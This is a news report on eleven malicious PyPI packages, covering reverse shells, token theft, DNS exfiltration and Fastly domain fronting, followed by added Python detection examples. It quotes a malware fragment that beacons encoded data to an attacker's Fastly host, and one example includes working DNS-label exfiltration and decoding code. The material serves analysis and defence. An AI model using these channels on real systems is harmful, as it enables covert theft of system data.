Malicious libraries found in the PyPI repository that use the PyPI CDN to hide their communication channel

Eleven packages containing malicious code have been identified in the PyPI (Python Package Index) repository. Before the problem was discovered, the packages had been downloaded about 38 thousand times in total. The malicious packages stand out for the sophisticated techniques they use to hide their communication channels with the attackers' servers.

  • important (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to give shell access to the system (a reverse shell), and used the TrevorC2 framework to hide the communication channel.
  • pptest (10001), ipboards (946) - used DNS as the communication channel to transmit information about the system (the first package: hostname, working directory, internal and external IP; the second: username and hostname).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - searched the system for a Discord service token and sent it to an external host.
  • trrfab (287) - sent the identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message that the system had been compromised and redirected to a page with further information about next steps, served via nda.ya.ru (api.ya.cc).

Of particular note is the way the important and important-package packages reached their external hosts: they abused the Fastly content delivery network that fronts the PyPI repository to hide their activity. On the wire, the requests went to the pypi.python.org server (with the python.org name in the SNI field of the HTTPS connection), but the HTTP "Host" header carried the name of a server controlled by the attackers (sec.forward.io.global.prod.fastly.net). The CDN routed such requests to the attackers' origin server, while the TLS session the victim saw was still terminated with the pypi.python.org certificate.

The PyPI infrastructure is served through the Fastly content delivery network, which uses Varnish as a caching proxy and terminates TLS at the CDN edge rather than on the origin servers, forwarding HTTPS requests through the proxy. Whatever host a client intends to reach, the request lands on the proxy, which selects the target service from the HTTP "Host" header; the customers' domain names all resolve to the load-balanced CDN IP addresses shared by every Fastly client.

The attackers' server was likewise registered as a service with the Fastly CDN, which offers free plans to anyone and even allows anonymous sign-up. Notably, the same scheme is also used in the other direction, initiated from the attacker's side, to deliver requests to the victim when the reverse shell is set up. From the outside, the exchange with the attackers' server looks like a legitimate session with the PyPI repository, encrypted under PyPI's TLS certificate. This technique, known as "domain fronting", has long been used to hide the real hostname when bypassing blocking: some CDNs accept an HTTPS connection whose SNI names one host while the HTTP Host header inside the TLS session names the host actually being requested.


To further disguise the malicious activity, the TrevorC2 framework was used to make the exchange with the server resemble ordinary web browsing: for example, beacons were sent under the guise of downloading the image "https://pypi.python.org/images?guid=", with the encrypted data carried in the guid parameter. The fragment from the package (b64_payload is the encoded data prepared earlier in the malware):

    from urllib import request

    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    # URL and SNI name pypi.python.org; the Host header selects the attacker's Fastly service
    r = request.Request(url, headers={'Host': "psc.forward.io.global.prod.fastly.net"})
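The two traits described above, a Host header that does not match the SNI and an "image" request carrying a base64 blob, are what a defender can look for in an inspecting proxy's logs. The following is an added example, not code from the article or from the packages it describes; the log record shape (sni, host, url fields) and the sample records are constructed for the example, and the eTLD+1 check is a naive last-two-labels comparison rather than a Public Suffix List lookup.

```python
"""Flag PyPI-themed domain fronting and TrevorC2-style beacons in an egress log.

Added example, not code from the article or from the malicious packages.
Assumed (hypothetical) log shape: one dict per request with the TLS SNI, the HTTP
Host header and the full request URL, as an inspecting proxy might record them.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample payload and records, not captured traffic. Record 2 reproduces
# the pattern in the article: SNI and URL say pypi.python.org, the Host header names
# an attacker-controlled Fastly service, and the "image" request carries a blob.
BEACON_PAYLOAD = base64.b64encode(b"uid=0(root) gid=0(root) groups=0(root)").decode()
SAMPLE_LOG = [
    {"sni": "pypi.python.org", "host": "pypi.python.org",
     "url": "https://pypi.python.org/simple/requests/"},
    {"sni": "files.pythonhosted.org", "host": "files.pythonhosted.org",
     "url": "https://files.pythonhosted.org/packages/ab/cd/requests-2.26.0.tar.gz"},
    {"sni": "pypi.python.org", "host": "psc.forward.io.global.prod.fastly.net",
     "url": "https://pypi.python.org/images?guid=" + quote(BEACON_PAYLOAD, safe="")},
    {"sni": "pypi.org", "host": "pypi.org",
     "url": "https://pypi.org/search/?q=requests"},
]

# Base64 or URL-safe base64 alphabet, at least 16 characters. Hyphenated slugs can
# slip through this heuristic; it is a triage signal, not proof.
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")


def registrable_domain(name):
    """Naive eTLD+1 (last two labels); no Public Suffix List, enough for this check."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def looks_like_base64(value):
    """True if value uses the base64 (or URL-safe base64) alphabet and decodes cleanly."""
    if not B64_RE.match(value):
        return False
    core = value.rstrip("=").replace("-", "+").replace("_", "/")
    try:
        base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def analyze(record):
    """Return the reasons a single record is suspicious (empty list if none)."""
    reasons = []
    sni, host = record["sni"].lower(), record["host"].lower()
    if registrable_domain(sni) != registrable_domain(host):
        reasons.append("sni/host mismatch: %s vs %s" % (sni, host))
    if host.endswith(".fastly.net"):
        # Real customers are reached through their own domain; the shared backend
        # name in the Host header is what the fronting request has to send.
        reasons.append("host header names a shared CDN backend: " + host)
    for key, values in parse_qs(urlsplit(record["url"]).query).items():
        for value in values:
            if looks_like_base64(value):
                reasons.append("base64-like blob in query parameter %s (%d chars)" % (key, len(value)))
    return reasons


def find_fronting(log):
    """Map record index -> reasons, for every record with at least one reason."""
    hits = {}
    for index, record in enumerate(log):
        reasons = analyze(record)
        if reasons:
            hits[index] = reasons
    return hits


if __name__ == "__main__":
    for index, reasons in find_fronting(SAMPLE_LOG).items():
        print(index, SAMPLE_LOG[index]["url"])
        for reason in reasons:
            print("   ", reason)
```

The SNI/Host comparison is the check that matters: a client that honestly wants pypi.python.org never needs to name a *.fastly.net backend in its Host header, so a mismatch between the two layers is a strong signal regardless of what the URL looks like. The query-parameter check only adds context, since the payload is encrypted and decoding it yields nothing readable.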

The pptest and ipboards packages hid their network activity differently, by encoding the stolen data in queries to a DNS server. The malware transmits information by issuing DNS requests such as "nu4timjagq4fimbuhe.example.com", where the data destined for the control server is embedded in the domain name in base64 form. The attacker receives these messages by controlling the authoritative DNS server for the example.com zone.
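The DNS channel described above, shown from both ends together with the check a defender would run over resolver logs, as an added example that is not code from the article or from the packages. The zone (example.com), the key=value field layout, the hostnames and the log lines are constructed for the example. Because DNS labels are case-insensitive and cannot contain "+", "/" or "=", the example encodes with lowercase, unpadded base32 rather than the base64 the article reports; the decoder reverses exactly that encoding.

```python
"""DNS-label exfiltration of the pptest/ipboards kind, shown from both ends plus a
resolver-log check.

Added example, not code from the article or the packages. The zone (example.com),
the field layout, the hostnames and the log lines are constructed for the example.
"""
import base64
import binascii
import math

ZONE = "example.com"
MAX_LABEL = 63  # RFC 1035 limit on a single label


def encode_beacon(fields, zone=ZONE):
    """Client side: pack key=value pairs into DNS labels under the attacker's zone.

    Labels are case-insensitive and cannot contain '+', '/' or '='. The article
    reports base64 in the query names; this example uses lowercase base32 with the
    padding stripped, which survives any resolver unchanged.
    """
    raw = ";".join("%s=%s" % item for item in fields.items()).encode()
    b32 = base64.b32encode(raw).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    return ".".join(labels + [zone])


def decode_beacon(qname, zone=ZONE):
    """Server side (authoritative NS for the zone): reassemble the labels and decode."""
    name = qname.lower().rstrip(".")
    suffix = "." + zone
    if not name.endswith(suffix):
        raise ValueError("query is not under the controlled zone")
    data = "".join(name[:-len(suffix)].split(".")).upper()
    raw = base64.b32decode(data + "=" * (-len(data) % 8))
    return dict(item.split("=", 1) for item in raw.decode().split(";"))


def label_entropy(label):
    """Shannon entropy of a label in bits per character."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in (label.count(ch) for ch in set(label)))


def suspicious_queries(log_lines, min_len=16, min_entropy=3.5):
    """Defender side: flag resolver-log queries whose leftmost label is long and
    high-entropy, the signature of encoded data riding in a name. Assumed log format:
    '<timestamp> <client> <qname>'. Returns the flagged qnames."""
    flagged = []
    for line in log_lines:
        qname = line.split()[-1].rstrip(".")
        first = qname.split(".")[0]
        if len(first) >= min_len and label_entropy(first) >= min_entropy:
            flagged.append(qname)
    return flagged


# Constructed resolver log: three ordinary names, the example query quoted in the
# article, and one beacon produced by encode_beacon above.
SAMPLE_RESOLVER_LOG = [
    "2021-11-18T10:00:01 10.0.0.5 www.python.org",
    "2021-11-18T10:00:02 10.0.0.5 files.pythonhosted.org",
    "2021-11-18T10:00:03 10.0.0.5 ssl-tools-cdn-static.example.net",
    "2021-11-18T10:00:04 10.0.0.7 nu4timjagq4fimbuhe.example.com",
    "2021-11-18T10:00:05 10.0.0.7 " + encode_beacon({"host": "build-01", "user": "root"}),
]

if __name__ == "__main__":
    for qname in suspicious_queries(SAMPLE_RESOLVER_LOG):
        print("flagged:", qname)
        if qname.endswith("." + ZONE):
            try:
                print("  decoded:", decode_beacon(qname))
            except (ValueError, binascii.Error, UnicodeDecodeError) as exc:
                print("  not this encoding:", exc)
```

The long, high-entropy leftmost label is what gives this channel away in a resolver log: ordinary hostnames are short dictionary-like labels, whereas a label stuffed with encoded data spreads across the whole base32 alphabet. A long hyphenated slug passes because its entropy stays low, while the article's own example query is caught. Tuning min_len and min_entropy against a site's real traffic is required before alerting on it.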

source: budenet.ru
